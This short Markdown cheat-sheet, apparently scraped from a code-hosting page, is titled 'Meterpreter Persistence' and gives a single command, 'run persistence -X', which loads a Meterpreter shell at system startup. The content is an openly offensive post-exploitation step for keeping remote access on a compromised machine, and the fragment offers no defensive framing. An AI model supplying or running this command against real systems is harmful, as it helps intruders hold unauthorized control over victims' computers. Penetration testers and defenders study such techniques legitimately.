7 lines
88 B
Markdown
7 lines
88 B
Markdown
|
# Meterpreter Persistence
|
||
|
|
||
|
## Load shell on system startup
|
||
|
```sh
|
||
|
run persistence -X
|
||
|
```
|